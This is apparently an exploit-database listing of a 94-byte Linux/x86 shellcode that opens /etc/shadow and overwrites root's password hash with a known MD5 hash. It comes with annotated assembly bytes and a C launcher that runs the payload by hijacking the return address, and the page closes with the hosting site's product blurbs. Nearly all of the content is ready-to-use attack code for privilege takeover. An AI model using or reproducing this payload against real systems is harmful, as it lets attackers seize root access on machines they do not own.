Lucene search
K

linux/x86 pwrite("/etc/shadow", hash, 32, 8) Shellcode 94 bytes

🗓️ 17 May 2010 00:00:00Reported by agixType 
zdt
 zdt
🔗 0day.today👁 17 Views

Linux/x86 pwrite to Shadow Replace root passwor

Code
===============================================================
linux/x86 pwrite("/etc/shadow", hash, 32, 8) Shellcode 94 bytes
===============================================================


 /* 
 | Title: Linux/x86 pwrite("/etc/shadow", hash, 32, 8) Shellcode 94 Bytes
 | Description: replace root's password with hash of "agix" in MD5
 | Type: Shellcode
 | Author: agix
 | Platform: Linux X86
*/

#include <stdio.h>

char shellcode[] =
"\x31\xC9"             //xor ecx,ecx
"\x51"               //push ecx
"\x68\x61\x64\x6F\x77"       //push dword 0x776f6461
"\x68\x63\x2F\x73\x68"       //push dword 0x68732f63
"\x68\x2F\x2F\x65\x74" //push dword 0x74652f2f
"\x89\xE3"               //mov ebx,esp
"\x66\xB9\x91\x01"           //mov cx,0x191
"\x31\xC0"               //xor eax,eax
"\xB0\x05"               //mov al,0x5
"\xCD\x80"               //int 0x80
"\x89\xC3"               //mov ebx,eax
"\x68\x32\x48\x31\x3A"       //push dword 0x3a314832
"\x68\x4F\x65\x4B\x66"       //push dword 0x664b654f
"\x68\x7A\x37\x6B\x45"       //push dword 0x456b377a
"\x68\x38\x48\x35\x75"       //push dword 0x75354838
"\x68\x50\x73\x31\x42"       //push dword 0x42317350
"\x68\x24\x4E\x75\x68"       //push dword 0x68754e24
"\x68\x6D\x67\x69\x39"       //push dword 0x3969676d
"\x68\x49\x4D\x4D\x6B"       //push dword 0x6b4d4d49
"\x89\xE1"               //mov ecx,esp
"\x31\xC0"               //xor eax,eax
"\x31\xD2"               //xor edx,edx
"\xB2\x20"               //mov dl,0x20
"\xB0\xB5"               //mov al,0xb5
"\x31\xF6"               //xor esi,esi
"\x46"                 //inc esi
"\x46"                 //inc esi
"\x01\xF6"               //add esi,esi
"\x01\xF6"               //add esi,esi
"\x31\xFF"             //xor edi,edi
"\xCD\x80";               //int 0x80

int main(int argc, char **argv) {
        int *ret;
        ret = (int *)&ret + 2;
        (*ret) = (int) shellcode;
}



#  0day.today [2018-03-16]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 May 2010 00:00Current
7High risk
Vulners AI Score7
17